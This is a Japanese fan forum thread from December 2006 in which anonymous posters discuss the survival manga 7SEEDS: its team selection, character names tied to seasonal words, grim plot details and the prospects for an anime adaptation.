生存者達は、まったくそのことに気が付いてなかったんだと。

800 :花と名無しさん:2006/12/05(火) 06:50:13 ID:???0
タバコ吸ってるバカが
自分の服や髪についてる臭いに
まったく気付いてないのと同じだねw

801 :花と名無しさん:2006/12/05(火) 07:46:13 ID:???0
>>798
Bってナツたち? それとも姐さんたち?
ある意味ジョーカーと言える夏Aをいきなり主役(ナツや花)にぶつけるか、それとも現状報告も兼ねて
夏Bや春の居残り組と遭遇させるか、どっちだろうね。
居残り組とあたると、なんか不慮の事件が起きそうで怖い気もするけど。

802 :花と名無しさん:2006/12/05(火) 08:01:10 ID:???0
夏Aは対中・露

803 :花と名無しさん:2006/12/05(火) 09:04:39 ID:???0
結局殺し合いになったりして残り7人になったところで
宇宙船が迎えに来て貴士が「お前達は合格だ!」だと思う。

804 :花と名無しさん:2006/12/05(火) 09:35:12 ID:???0
>>782
犬や虎そのものが生き残ったんじゃなくて、
一旦生物が絶滅して進化して犬や虎っぽくなっただけなんじゃないか

>>803
新説ktkr

805 :花と名無しさん:2006/12/05(火) 09:36:38 ID:???0
>>804
そんな事言うとSF脳が暴れるぞ

806 :花と名無しさん:2006/12/05(火) 10:37:51 ID:???O
>>801
夏Aは主役視点になれるチームなので、いきなり秋とぶつかってもいけるかも。
ただそうすると夏Aの他チームへの偏見がますます固定しそうだな。

807 :花と名無しさん:2006/12/05(火) 10:40:40 ID:???0
生きるための知識や体力をつけられた人間は
自然に生きてきた人間よりも生きていけない

結局こうなると思う

花やナツが生き残り
夏Aは全滅する

808 :花と名無しさん:2006/12/05(火) 11:20:22 ID:???0
>>805
新種だと思うよ
吹雪と美鶴さんが何年生きてると思う?
普通の犬ならとっくに寿命だよ

809 :花と名無しさん:2006/12/05(火) 11:39:49 ID:???O
>>808
北海道に持ち込んだ狼が生き残って進化したって設定なんじゃない。
狼について冬の章で言ってたでしょ。

810 :花と名無しさん:2006/12/05(火) 11:50:39 ID:???0
生態系の進化にどれだけ時間がかかると思ってるんだよ
たとえ放射能やら何やらがあったとしても
それが無くなってからも適応してるわけだろ?
巨大な隕石が衝突したくせに
磁場や地軸、自転、公転に何も影響せず
建築物が驚異的なくらい現存してる
そんな無茶な設定があるかよwwww

これだから少女マンガってやつは糞だよなw
(少年マンガにも糞はあるが)
ちゃんと世界観構築してから描けよな

てSF脳は思うんでしょ


811 :花と名無しさん:2006/12/05(火) 12:17:41 ID:???O
>>807
サバイバルのために純粋培養された者達が生き残れるとは限らないけど、
ナツや花は今のとこ運で生き残ってる気がす。

812 :花と名無しさん:2006/12/05(火) 13:49:53 ID:???0
>>810
ガンダムがまかり通ってるここ数十年のSFからすりゃ十分許容内

813 :花と名無しさん:2006/12/05(火) 13:56:13 ID:???0
想像を裏切って夏Aが最後に生き残ってほしい
それかもう全員生き残ってもいい

814 :花と名無しさん:2006/12/05(火) 14:10:45 ID:???0
>>806
夏Aと秋がぶつかったとしたら、むしろ夏Aは他チームを見直すと思う。
精神的に荒んでいても秋自体は能力高いし、荒んでいるのは夏Aも同じだし。
夏Aが選ばれるまでの苦労を主張すれば
秋は勝手に選ばれていきなり未来に放り出された
自分達の立場を主張するだろうし。
一番理想的なのは単体の鷹で、最悪なのは単体の蝉丸だな。

815 :花と名無しさん:2006/12/05(火) 14:12:37 ID:???0
夏Aが全員まとまって行動してるとは思えない

816 :花と名無しさん:2006/12/05(火) 14:20:31 ID:???0
夏Aっていくつなんだろう。眠ったのは花たちよりも早いけど、
目覚めたのは花たちと同じくらいであってほしい。

817 :花と名無しさん:2006/12/05(火) 14:41:48 ID:LaH+FZPY0
タイムラグか。
なんだか、水上澄子さんの『セントフェリシティ号はいく』を思い出す。
光に近いスピードの宇宙船に乗って旅立った双子の妹が地球に帰ってきた時、兄と20歳も年が離れていたって言う漫画。
夏Aって他のグループの人たちよりずっと年上なわけでしょ。花たちと同じ頃に目覚めていとしたら、ずっと、年下なはずの鷹より年下になるんだね・・・。

818 :花と名無しさん:2006/12/05(火) 15:21:53 ID:???0
全員生き残ってチーム組んで
外国のチームとバトルトーナメントやってくれたら人気もアップすると思う

819 :花と名無しさん:2006/12/05(火) 15:25:27 ID:???0
一人の例外除いてフェミニしかいないのは
そういうのが選ばれてるんだろうか

820 :花と名無しさん:2006/12/05(火) 15:58:24 ID:???0
一人例外をkwsk

821 :花と名無しさん:2006/12/05(火) 16:04:36 ID:???0
春のガイドの人

822 :花と名無しさん:2006/12/05(火) 16:33:02 ID:???0
>>810
たかが数十キロメートル程度の隕石がいくつかぶつかったぐらいで地軸や自転や公転が目に見えて狂うわきゃねーだろw

823 :花と名無しさん:2006/12/05(火) 16:40:08 ID:???0
>>819
容姿端麗な人が選ばれてるって夏Bのガイドの姉さんが言ってたからそうなんじゃね?

824 :花と名無しさん:2006/12/05(火) 16:43:05 ID:???0
フェミニスト

本来、フェミニストは女に甘い男性、女性を特に尊重する男性、女性を大切にする男性、
女性をちやほやする男性といったものを意味する言葉としても用いられてきた。

825 :花と名無しさん:2006/12/05(火) 16:46:04 ID:???0
>>823
フェミをなんだと思ってるのか聞きたい

826 :花と名無しさん:2006/12/05(火) 17:46:38 ID:???0
>823 じゃないけど、「フェミニン(女らしい)」だと思ったのでは?

827 :823:2006/12/05(火) 18:44:30 ID:???0
ごめんなさい。>>823だが、普通に意味を間違えてました。
これは痛い。

828 :花と名無しさん:2006/12/05(火) 19:14:35 ID:???0
ここで変な事書いた人は罰として一人であのバッテンが書かれた部屋に入ることw

829 :花と名無しさん:2006/12/05(火) 20:35:10 ID:???O
地球が滅亡します。
天災で死ぬのと、
対策として全員を救うつもりはありませんが
人為的に生かされたり殺されたりするのと
どれがいいですか?
という漫画みたいだ。



戦争がからんでたら最終兵器彼女みたいな
ラストになりそうでそれはそれで鬱

830 :花と名無しさん:2006/12/05(火) 21:04:16 ID:???0
卯浪と柳がもしも出会っていたら絶対に意気投合していたと思う。
固い友情で結ばれて熱い戦いをしていただろう。

831 :花と名無しさん:2006/12/05(火) 21:20:09 ID:???O
結局嵐が夏Bなのは2番目の夏チームに入れるしかないからで、傷害事件を起こしたのは何の関係
もないの?
どうせ夏Aに出会って憎まれる可能性も考えてないなら花と一緒にしてやれば良かったのに。
あの二人なら例え他の仲間に妬まれても平気だろう。

832 :花と名無しさん:2006/12/05(火) 21:30:48 ID:???0
意味がわからない…
夏Bなのは傷害事件を起こしたという欠点があるからで、
名前が「嵐」だからだろう。
てか、そんなべたべたカップル漫画読みたくないし。

833 :花と名無しさん:2006/12/05(火) 21:51:05 ID:???0
>>788
居ぬって書いてあるよw
ただ、居ぬは日本語話さないじゃん。「会話」が成立しないだろ

834 :花と名無しさん:2006/12/05(火) 21:56:19 ID:???0
>>832
いや、結局そういう漫画でしょ
恋人を訪ねて三千里(サバイバル編)

835 :花と名無しさん:2006/12/05(火) 21:57:02 ID:???O
>>832
わからないかな?夏Aには入れられないでしょ。計画した人の近親者なんだから同じ
チームに入れようと思えば入れられる。嵐を春の嵐と解釈することもできるし。
何にも説明なしに別々に送られたおかげで読者は彼らが無駄に苦しむのを何巻も見な
ければいけなかったしw 話的にそれを言ってはお仕m… なのは分かった上で花が可愛
い計画者の考えとしてはどうなんだってことです。

836 :花と名無しさん:2006/12/05(火) 22:14:26 ID:???0
本当は春に入れたかったけど、傷害事件起こしたから
夏Bに…ていう設定ナンデソ

837 :花と名無しさん:2006/12/05(火) 23:06:39 ID:???0
嵐はサバイバル面ではヘタレだし、それを上回る抜きん出た才能が
ある訳でもないから、夏B無理やりで順当だと思う。

838 :花と名無しさん:2006/12/05(火) 23:19:06 ID:???0
ンだな。嵐はこれといって(選ばれたほかの優等生に比べれば)優秀でもないし、
同じく夏Bで妥当だと思う。
もし嵐が花の恋人じゃなければ、絶対に・・とは言い切れないが99.999%くらいは選ばれてなかっただろう。
傷害事件を起こして無くても夏Bだな。

839 :花と名無しさん:2006/12/05(火) 23:41:13 ID:???0
一応水泳という特技があるじゃないか

840 :花と名無しさん:2006/12/06(水) 00:01:48 ID:???O
花を体張って守ってインターハイだっけ?をフイにしたのに貴士に軟弱言われるわ、
一番の特技すら一部読者には大したことない扱いだわ、嵐…。

841 :花と名無しさん:2006/12/06(水) 00:46:45 ID:???O
水泳は安居とかぶってるしね―

842 :花と名無しさん:2006/12/06(水) 01:06:55 ID:???O
ARASHI! ARASHI!
For Dream♪

843 :花と名無しさん:2006/12/06(水) 01:14:07 ID:???0
オリンピックの登竜門の登竜門くらいを通れるか通れないかぐらいの実力はあるんだから、負けるな嵐!


あ…全然励ましになってないな

844 :花と名無しさん:2006/12/06(水) 01:36:46 ID:???O
安吾と嵐が水泳が得意、ってのは何かの伏線だと思う
前に出たクローン説とかね

845 :花と名無しさん:2006/12/06(水) 02:12:02 ID:???O
花と嵐が別チームなことについては、もっと大層な、7SEEDS計画の成功の鍵を握る理由でもあるの
かと思ってたんだけどなあ。ハルと鷹が、一緒に入れればいいのに何で別々にしたんだ、故意に選
んで恋に賭けた、などと思わせぶりなセリフを言ってたし。

846 :花と名無しさん:2006/12/06(水) 02:34:41 ID:???0
たいした意味なんて無いんだろ
プロジェクトの中枢に花の身内がいたから遊び心でってのが
残念な事に一番説得力がある

夏Bの面々はそれぞれ春秋冬の誰かと関わりがあるとかなら面白かったんだけどな

847 :花と名無しさん:2006/12/06(水) 03:43:48 ID:???0
>夏Bの面々はそれぞれ春秋冬の誰かと関わりがあるとかなら
それは面白いなー

まあ、遊び心っていうより私欲による権力でのゴリ押しといったところか
美帆がスタッフとして働いてるのは彼女なりの贖罪のつもりかな

848 :花と名無しさん:2006/12/06(水) 05:19:36 ID:???0
花と嵐の名前が「月にむら雲、花に嵐、想うに別れ、想わぬに添う」からとられていることに今気づいた……orz

849 :花と名無しさん:2006/12/06(水) 07:53:49 ID:???0
夏Bの勘のいい子供の蛍ちゃんと春の眠りから覚めてない長髪の女の子って
姉妹かなんか?

850 :花と名無しさん:2006/12/06(水) 09:08:35 ID:???0
とりあえずその二人の出会いは楽しみだよな

851 :花と名無しさん:2006/12/06(水) 12:05:42 ID:???0
>>849
姉妹だとすると、
人類の存続のためには多様な遺伝子が必要なはずだから
その必要性を凌ぐほど姉妹が揃うことが重要ということになるよね
ちょっと楽しみかな

852 :花と名無しさん:2006/12/06(水) 12:08:34 ID:???O
>>819
蝉も違うだろう。

853 :花と名無しさん:2006/12/06(水) 12:24:28 ID:???0
涼とかアキオ(秋のリーダーぽヒト)もフェミってわけじゃないと思う。

854 :花と名無しさん:2006/12/06(水) 12:26:18 ID:s2/BPSLd0
人類存続のためなら、最初から若い恋人同士とか、子どものいない夫婦とかを選んで一緒に眠らせとけばいいのにね。
その方がよっぽど効果的な気がするが・・・。
秋のチームみたいなのもいるしね。
我がチームは○○○禁止なんてね・・・。

855 :花と名無しさん:2006/12/06(水) 14:13:27 ID:???0
禁止したってハラボテになっている。人間はどんな時でもやることはやるw

子孫残しが目的なら、男女とも確実に子種ありが絶対条件だと思うが、
夏B以外の人たちの繁殖機能の健康チェックはちゃんとやったのかな?
てか、お子様も混じっているがその辺はどうなのだろうか?

856 :花と名無しさん:2006/12/06(水) 14:59:10 ID:???0
>>835
春の嵐って…手元に時点とか歳時記とかないけど、それって季語?
解釈の問題じゃなくて、季語かどうかだよ?
それに花がかわいい計画者って、嵐のことを認めてたっけ?

857 :花と名無しさん:2006/12/06(水) 16:18:59 ID:???O
華の嵐とか愛の嵐ってドラマあったよね…w
嵐なんでも合うなw

858 :花と名無しさん:2006/12/06(水) 16:41:48 ID:???O
「嵐」は単独だと季節がわかんないんじゃなかったっけ。
「花」は単独なら桜のことで間違いなく春だけど、
「嵐」は前に付ける字によって夏にも秋にもなる。
春や冬になるかは忘れたけど。

859 :花と名無しさん:2006/12/06(水) 16:49:02 ID:???O
>>856
百舌は夏の季語じゃないんでしょ?ナツが疑問に思うくらいだから。
恋人だから入れてやる、というそこまで甘い理由なら、それくらいの融通は聞かせるだろ。
実際7SEEDS計画を最後まで実行したのが要なのか貴士なのかは知らないが、花のこと考えてるなら
他チーム同士はすぐには会えないんだから、同じチームに入れてやればいいのに、てな。

860 :花と名無しさん:2006/12/06(水) 16:55:16 ID:???0
そこは親父の心理だったのかもw
娘が好きな奴をいれてやろうかと思っても、最初からお膳立てしてやるほど
嵐のことを認めてなかったか、親父として複雑だったか。
でも遠い未来で知らない奴ばっかりで、好きな奴がいるのにほかのやつと
子孫を残すことになるかも、ってのは可哀想な気がして、嵐を入れようと思った。
でも最初から一緒だとムカつくので、別の、しかも何か苦労しそうな
Bチームに嵐を入れて、でも娘の気性的に、絶望しないように嵐がいることを
におわせるアイテムをかばんに仕込んだ、って感じかも。

861 :花と名無しさん:2006/12/06(水) 16:58:28 ID:???O
嵐の季語は?については作中で花が考えてたよね。
前広辞苑で見たら、青田や青嵐は夏だった。
冬チームでも鮫とか鶴は季語印がついてなかったから、姓名両方が必ず季
語でなければダメ、なわけでもないらしい。

862 :花と名無しさん:2006/12/06(水) 17:01:17 ID:???O
華の嵐=ハナの嵐でFA

863 :花と名無しさん:2006/12/06(水) 17:01:57 ID:???0
そもそも高校生くらいの人間が、みんな季語について違和感なく
話してるのが違和感だったけどw
高校生の時に季語なんて知ってたかなあ。
百舌が夏か?ってのはわかったかもしれないけど。
>859百舌は死神だから、甘い理由とは別物だろ。

864 :花と名無しさん:2006/12/06(水) 17:08:15 ID:???0
学校に通ってそこそこ授業も聞いてた高校生なら
季語くらい分かると思う。
わかんなくても、夏っぽいとか冬っぽいとか日本に暮らしてればなんとなく分かるでしょ

865 :花と名無しさん:2006/12/06(水) 17:12:12 ID:???O
理由があるなら必ずしもこだわってない、てことを言いたかったの。
百舌が夏Bなのは話的にそれ以外だと収まりが悪いかららしいけど。
確かに他のチームだった時のことを考えると…w

866 :花と名無しさん:2006/12/06(水) 17:34:52 ID:???0
さてここで問題
五月雨は何時の季語でしょう

867 :花と名無しさん:2006/12/06(水) 17:40:45 ID:???0
>>859
少し前のレスにあるように、嵐は本チームに入れてまで残す価値のある
才能なり遺伝子なりを持っていると判断されてないんじゃ?
入るとしたら夏Bしかない。

868 :花と名無しさん:2006/12/06(水) 17:42:43 ID:???O
五月雨を集めてはやし最上川……夏?

869 :花と名無しさん:2006/12/06(水) 17:46:09 ID:???O
夏だけ他チームとは境遇や選抜基準が違うんだよねえ。
エリート中のエリートかちょっと問題児か、両極端。

870 :花と名無しさん:2006/12/06(水) 17:49:25 ID:???O
>>869
それが夏を二つのチームに分けた意図だしね

871 :花と名無しさん:2006/12/06(水) 18:18:09 ID:???0
>>866
単純に考えて、夏

872 :花と名無しさん:2006/12/06(水) 18:28:40 ID:???O
>>867
それだと神童ピアニストから普通の人になりかけのハルが入ってるのはど
ういう基準なんだろ?彼こそ耳がいいだけで全くサバイバルに不適じゃ。
>>860 が一番納得できるな。

873 :花と名無しさん:2006/12/06(水) 19:11:58 ID:???O
化粧もできなくなると
皆眉毛ボンバーにならない?
鏡くらいあるか…

874 :花と名無しさん:2006/12/06(水) 20:00:01 ID:???0
私はあの状況で眉毛の手入れしてるってのが不思議に思うけども

875 :花と名無しさん:2006/12/06(水) 20:40:20 ID:???0
花は化粧水がどうとか泥パックがどうとか
美容に気を使っているみたいだけど
ナツはそういう方面には興味ないみたいね。
夏Aの女の子達はマニキュア位でスカートもはいた事ないし。

876 :花と名無しさん:2006/12/06(水) 22:14:26 ID:???0
>>872
第2の能力にそのうち目覚めるのさ!

877 :花と名無しさん:2006/12/06(水) 23:43:36 ID:???0
>>854
あの人数で繁殖となると特定の相手を決めない総当たり方式じゃないと無理だから
逆に恋人とか夫婦同士は非効率的だと思う

878 :花と名無しさん:2006/12/07(木) 00:14:28 ID:???0
以前誰かが書いてたが
やっぱシェルターでミートキューブ作製のお話になりそだな

879 :花と名無しさん:2006/12/07(木) 01:58:29 ID:???0
>>878
怖すぎる…
シェルター水浸しの顛末があまりにショボかったから
X計画始動に至るハードルが低すぎてさらに怖い


880 :花と名無しさん:2006/12/07(木) 02:54:20 ID:???O
実際、衣類は燃料にし
医療用に血液は取っておいて
肉は食べれる部分を加工して食べ
骨は使い道として粉末にしてなんかの材料に使い
脳は用途あるか…?
使わん物は農耕家畜飼料で最後の最後に滅菌して廃棄だろうか
あと定期的に何人か観測用に地上にだして
人体への暴露状況を検討とか

処分に手間かけるならリサイクル利用を考えてそう

まあまともな末路はないな…

881 :花と名無しさん:2006/12/07(木) 03:56:22 ID:???0
そこまでキモい事する必要あるのかな?
手間を考えるなら薬殺して焼却処分すればいいだけじゃない、食い扶持減らすために
保存したり加工する技術も大掛かりな設備がないと無理でしょう

882 :花と名無しさん:2006/12/07(木) 06:52:02 ID:???0
猫Mixの方、王様のやった事の意味が分からん。あれじゃ、パイヤンの反感を買うだけだし
家族を中央に呼び寄せて飼い殺しとかの方がまだ分かるんだが…
重用してるのは見せかけだけで本当は始末したかったのか、忠誠心を試したかったのか
悲劇を作り出したいが為に王様がおかしな人になってるよ
郵便屋と文通してたかと思うと笑えるけど

883 :花と名無しさん :2006/12/07(木) 09:47:18 ID:???0
キモいというか「限りある資源は有効に使いましょう」ってことだろ。


884 :花と名無しさん:2006/12/07(木) 10:25:33 ID:???0
>>882
前に掲載された分読んだー?
私も読んでないけど……
フラワーズはこれまでのあらすじとか登場人物紹介を
もっと詳しくやってほしいなと思う。

885 :花と名無しさん:2006/12/07(木) 13:09:30 ID:???0
あの王様はもともとおかしな王様という設定だ。

886 :花と名無しさん:2006/12/07(木) 13:57:29 ID:???0
>>883
穀雨の章でも脱落した子供達を畑の肥料にしていたから
そういう意識は当然持っているだろうね。

887 :花と名無しさん:2006/12/07(木) 14:35:45 ID:Yh7rvmjs0
脱落した子ども達はその時点で一般の社会に出して、普通の子どもとして平凡に暮らさせてやればいいのにと思ったが、秘密裏に行われていることなので秘密をしゃべられたら困るから口封じをするしかなかったんだろうね。
でも、何とか助けられなかったのか。

888 :花と名無しさん:2006/12/07(木) 15:04:43 ID:???0
実は先生達は人肉スープが好物だったので、一石二鳥なのです

889 :花と名無しさん:2006/12/07(木) 16:00:06 ID:???O
たかし、きぐるみ見回りで自分の好感度上がったんだけど、そっか…
忘れてたよ…脱落者を肥料にしてたんだよね…

890 :花と名無しさん:2006/12/07(木) 20:21:07 ID:???0
>>880
狂牛病の人間版みたいな心配ないのかなぁ。とか思ったけど
そんなこといってる場合じゃねぇ!って設定かぁ(・ω・)

891 :花と名無しさん:2006/12/07(木) 21:12:36 ID:???O
>>890
それで全滅したんだったりして。

892 :花と名無しさん:2006/12/07(木) 22:29:31 ID:???O
>>860
花のためを思って考えに考えたか、
単純に名前の季語で別チームかと…
>>854みたいな考えは効率よさげだけど、
厳しい環境に放り出されて本性曝け出したら
喧嘩別れになるカップルもいそうじゃない?
最初から嵐と一緒で花が嵐に幻滅して
未来生活スタートじゃ可哀想だから、
嵐に巡り逢えるまで希望を持って頑張る
スタートの方がいいって考えたのかもしれない
…なんてね

893 :花と名無しさん:2006/12/07(木) 22:38:51 ID:???0
>863
季語って小学校でも中学校でも国語で出てきたよ。
よっぽどのバカじゃなきゃ知ってるんじゃね?

894 :花と名無しさん:2006/12/07(木) 23:30:40 ID:???0
>>887
殺すくらいなら、ヤバげな薬で洗脳とかして外に出してやればいいのに
借りてきた猫でも…というし、何年も育てたら普通情も湧くだろうに
グロくしすぎだろ

895 :花と名無しさん:2006/12/07(木) 23:31:29 ID:???0
もし花の好きになる人が嵐じゃなくて別の人だったらどうだったんだろう。
嵐だと単独で季語になるかどうか微妙だが、何とか言い訳はつくよな。
もし「達也」とか季語でも何でもない人を好きになっても季語とか関係なく夏Bに入れたのかな。
百舌も入ってるくらいだし。

896 :花と名無しさん:2006/12/08(金) 00:14:00 ID:???O
デスノートのからくりと似てるよね。
現実にはなさそうでちょっとあるかな?と思えてしまう世界観。
登場人物の名前だけがフィクション。

897 :花と名無しさん:2006/12/08(金) 00:15:42 ID:???0
デスノートはちょっともねぇよ。

898 :花と名無しさん:2006/12/08(金) 00:15:48 ID:???0
>>895
強引に改名させる

899 :花と名無しさん:2006/12/08(金) 00:25:09 ID:???0
ですノーとは絶対ありえないが、この作品もいい勝負だと思うよ

900 :花と名無しさん:2006/12/08(金) 00:28:13 ID:???0
>>898
その発想はなかった

901 :花と名無しさん:2006/12/08(金) 00:39:21 ID:???O
>>890
ヤコブ病の一種なら人肉食べる習慣があった部族で見つかってる>狂牛病人間版

と、いっても食人習慣止めたんで現実には新たに発生したりはしないけど
潜伏期間は最長30年と仮定されてる
潜伏期間長過ぎるが故ネタにはできないかもw

902 :花と名無しさん:2006/12/08(金) 00:39:56 ID:???O
名前だけがフィクション臭全開なのでありえそーな世界観がやっぱり二次元の世界になっててそのミックス?が面白いみたいな批評を雑誌で読んだ(うろ覚え)
7種にも通じるものがある。
だって登場人物の名前季語や神話でありえないものばっかじゃん?
デスノのキャラも神話から名前きてるし

903 :花と名無しさん:2006/12/08(金) 00:57:17 ID:???0
デスノの名前はありそうだろ、今時の親ならあれ位つけるし
七種がフィクション臭いのは名前だけじゃないっての
ていうか、いつまでもデスノで引っ張るな

904 :花と名無しさん:2006/12/08(金) 00:58:12 ID:???0
≫878 藤子・F・不二雄の「カンビュセスの籤」だよね。
あんなふうになるんだろうか。

905 :花と名無しさん:2006/12/08(金) 01:00:21 ID:???O
もともと漫画のキャラの名前なんてあり得ない名前だらけじゃないのw
あなたがデスノにはまり中だから無理に結び付けたくなってるんじゃ?


906 :花と名無しさん:2006/12/08(金) 02:39:25 ID:???0
どこだかの、新生児のDQN名リストを作ってるサイトを一度でも見てしまうと
デスノの登場人物の名前はむしろまっとうにすら思えてくる

907 :花と名無しさん:2006/12/08(金) 04:08:15 ID:???0
>>884
前の話なんてあるんだ、新連載かと思った


908 :花と名無しさん:2006/12/08(金) 08:24:03 ID:???0
>>895
チームの分け方を四季にはしなかったんじゃないの?
該当者の中から最後には四季で決めたと言ってたから、他の基準で決めればいいだけ。

909 :花と名無しさん:2006/12/08(金) 08:27:28 ID:???0
>>890
ttp://d.hatena.ne.jp/keyword/%A5%AF%A1%BC%A5%EB%A1%BC%C9%C2

910 :花と名無しさん:2006/12/08(金) 08:28:35 ID:???0
出遅れた……orz

911 :花と名無しさん:2006/12/08(金) 11:04:08 ID:???O
これからの展開によっては、アニメ化しにくく人にも勧めたりしにくい漫画になりそう…。

912 :花と名無しさん:2006/12/08(金) 14:41:49 ID:???0
>>907
2話あるよ

913 :花と名無しさん:2006/12/08(金) 15:02:36 ID:???0
7seedsでいちばん幸せなのって、解凍失敗した連中かもしれんと思えてきたw
世界崩壊も知らずに残された絶望も味わわずに安らかに逝けたし

914 :花と名無しさん:2006/12/08(金) 16:32:52 ID:MlmgI6yrO
いや、普通に生きていて、崩壊時は訳の分からないまま一瞬に
あるいは好きな人と、死ねた人だと思う。
本人の意志とは無関係にある日突然冷凍されて、しかも失敗してそのまま死亡…なんて最悪だよ。
種にされなければ、数年の人生があったのに

915 :花と名無しさん:2006/12/08(金) 16:57:15 ID:???0
それぞれのグループは、みたところ、冷凍のされ方が違うよね。
夏Bは一人ひとり別々のカプセルみたいな物で、夏Aはみな一緒に。
冬の場合って目覚めたらいきなり地面の上にいたみたいになっているし、どういう、冷凍のされかただったんだろう。
それを見るかぎりは冬が一番成功率が低そうなやり方に見える。
もっとも、秋と春についてはわからないが・・・。

>>914 卯浪は未来に行ってすぐ殺されたが、行かされなければ、あと17年は平和に生きられたんだよね。

916 :花と名無しさん:2006/12/08(金) 16:58:06 ID:???O
数年じゃないよ。Xデーは眠らされてしばらくしてかららしい。

917 :花と名無しさん:2006/12/08(金) 17:08:23 ID:???0
みんな眠った時間ばらばらだから混乱するねw

918 :花と名無しさん:2006/12/08(金) 18:18:23 ID:???O
春は東京の地下だと柳が言ってたよね。でも目覚めたのは海上。
秋はどうやらゴムボートを持ってなかったらしい。例え地下だったとしても
ボートはいるはず。謎だな。

919 :花と名無しさん:2006/12/08(金) 20:13:06 ID:???0
>>911も言ってたけど、これアニメ化はどうなんだろうね。
内容がバトロワ的だし、まずゴールデンは無理だろうな。
てか1クール2クールじゃ終わらないし、中途半端にやるくらいならアニメ化しないほうがいいだろうね。

個人的には夏Aチームの9巻にあたるシーンがアニメになった所は見てみたいけど。

920 :花と名無しさん:2006/12/08(金) 20:42:16 ID:???0
>>915
卯浪は17年生きてられなかったような気がする。もし夏Aと一緒に行かなければ夏Aのメンバーを送り出した後
処分されたのではないかと。
能力的には必要な人材でもないし、何より頭も口も軽いから世に出せばバレるリスクも大きい。信頼のできる
メンバー以外は秘密護持のために粛清されたのでは。ピラミッドに王と宝を葬った人たちのように。

921 :花と名無しさん:2006/12/08(金) 20:47:48 ID:???0
眠った時間がずれてるのって夏Aだけじゃない?
春チームと夏Bチームは多分夏Aから焼く17年後の同じ日に眠ったんだよね。
冬も少なくとも同じ年に。秋はどうなんだろう。

922 :花と名無しさん:2006/12/08(金) 22:12:35 ID:???0
>>920
そこまでするかぁ、ロシアじゃあるまいし。
だったら最初から入れなければいい話だ。

923 :花と名無しさん:2006/12/08(金) 22:13:53 ID:???0
そもそも解凍の仕組みがよくわからない。
レンジのタイマーを回しておいて、時間がきたらチンするようになってるの?脳も眠ってたのに、誰も記憶喪失になってないのはなんで?

細胞も眠っているはずなのに、甲子園球児新巻スカルチノフの髪が伸びてたのはなんでなんだぜ?


↓冷凍前の新巻(たぶん坊主頭)
  _,,..,,,,_
/ ,' 3  `ヽーっ
l   ⊃ ⌒_つ
`'ー---‐'''''"

↓解凍後

  _,,..,,,,_
彡 ,' 3  `ヽーっ
彡   ⊃ ⌒_つ
`'ー---‐'''''"

鮫島はもとから長髪だったらしいけど。

924 :花と名無しさん:2006/12/08(金) 22:17:39 ID:???0
何かの漫画みたく、変な液体の中に眠ってるのかと思ってた。
冷凍なんだよな。

925 :花と名無しさん:2006/12/08(金) 22:36:18 ID:???O
そもそも7種計画って誰にメリットがあるんだろう


926 :花と名無しさん:2006/12/08(金) 22:38:10 ID:???0
花王

927 :花と名無しさん:2006/12/08(金) 23:34:16 ID:???O
自然解凍w
てか>>923の新巻ワロタwww

928 :花と名無しさん:2006/12/09(土) 01:10:44 ID:???O
>>919
花と嵐の再会までは絶対やらなければならないな。でもそれが後何巻後になるのか、間に夏Aとの
絡みがあるのかも不明だし。一巻を最低4話かけてやるとしても40話は必要かも。
ばっさり切って2クールなら、切るのは穀雨→冬→ナツと花側の話のどちらかの順だな。
好評なら二期もあり得るけど、ただでさえアニメ化される作品数が多すぎる今、注目される作品に
なるかはわからないしなあ。

929 :花と名無しさん:2006/12/09(土) 01:22:14 ID:???O
アニメのBASARAは見た人います?
私はないんですが、それはどうだったんですか〜?

930 :花と名無しさん:2006/12/09(土) 11:12:05 ID:???0
>>928
このスレでは花人気がないんでイマイチ主張しにくいんだけど、今までの流れで2クールでやるなら群像劇じゃなく
花、1人主役で進めた方が作りやすいような気はするな。アニメは漫画以上にわかりやすさが求められるから。
花&春チームを中心において、嵐+ナツ(夏B)、鷹(冬)、夏A、それに貴士とかの過去話を絡ませていく。
鷹の過去話も穀雨の話も挿入できると思うし。でもまあ穀雨とかをしっかりやろうと思ったらやっぱり2クールじゃ
無理だな。ふしぎ遊戯のように1年ぐらいやらせて欲しい。

どっちにしろ7種のアニメ化はまだ先の話だし、先にBASARAの続編(リメイクでも可)をやって欲しい。スタッフと
キャストは替えて。完結してるんだから作りやすいだろうし、しっかりとしたスタッフがやったら絶対名作になるよ。
原作があんなに面白いんだから。本意じゃないけど、腐女子もそれなりにつくだろうし人気でると思うんだけどな。
7種やフラワーズの販促にもなるだろうし、小学館はぜひ考えてもらいたい。あんな終わり方じゃだめでしょ。

931 :花と名無しさん:2006/12/09(土) 11:17:11 ID:???0
BASARAがアニメ化されてたことを最近知った。
世間では(アニメ好きの人の間でさえも)全然話題にならなかったよな。

932 :花と名無しさん:2006/12/09(土) 11:23:48 ID:???0
深夜で地方だったからじゃない?
一話目だけ頑張って見た。絵はきれいだったと思うが、
ビミョーにいろいろ好みと違うと思って、その後は見なかった。
原作途中までしかやらないっていうのは知ってたし。

933 :花と名無しさん:2006/12/09(土) 12:55:20 ID:???0
アニメひどいお
声優詳しくないからよくわからないけど
更紗の声ひでえ。セリフひでえ棒読み。
アニメ自体も間がとても悪いと思う。
原作にはかなり忠実だけど、
この間の抜けた流れなんとかならんかったんかな

934 :花と名無しさん:2006/12/09(土) 17:06:23 ID:???0
小説でも漫画でも、原作とはけっこうかけ離れているよね。特に原作を読んで気に入ってたりすると、がっかりする。

935 :花と名無しさん:2006/12/09(土) 19:02:10 ID:???0
原作が好きな人にとってアニメ化は最初嬉しいが
段々アニメオリジナルが入ってきたりして嫌になる事が多い
自分は好きな作品にはアニメ化して欲しくないな

936 :花と名無しさん:2006/12/09(土) 20:55:01 ID:???0
私も7SEEDSはアニメ化してほしくない。
>>930みたいに花一人主役ってのは絶対ヤダ。
決して花嫌いな訳じゃないけど、7SEEDSのストーリーそのものが好きだから。
ナツ主人公を捨ててまでアニメ化して欲しくない。

937 :花と名無しさん:2006/12/09(土) 21:57:11 ID:???0
それぞれの章でその章の主役視点で、というのが持ち味だと思うから
一人だけ際立たせる必要も無いと思う。もともとダブルヒロインなんだし。
アニメ化は関わったスタッフの嗜好で改変されるのでどうも苦手。


938 :花と名無しさん:2006/12/09(土) 23:32:39 ID:???0
あれだけ人気あったBASARAもアニメは初期のところで終わったしこの話はもっと無理そう
どこで終わるか分からない話ってやりにくいだろうし

939 :花と名無しさん:2006/12/09(土) 23:42:31 ID:???0
>>911
夏Aの時点ですでにやばいだろ
攪拌して肥料っすよ

940 :花と名無しさん:2006/12/10(日) 00:02:47 ID:???0
>攪拌して肥料
なんであんな気持ち悪い事したのかな
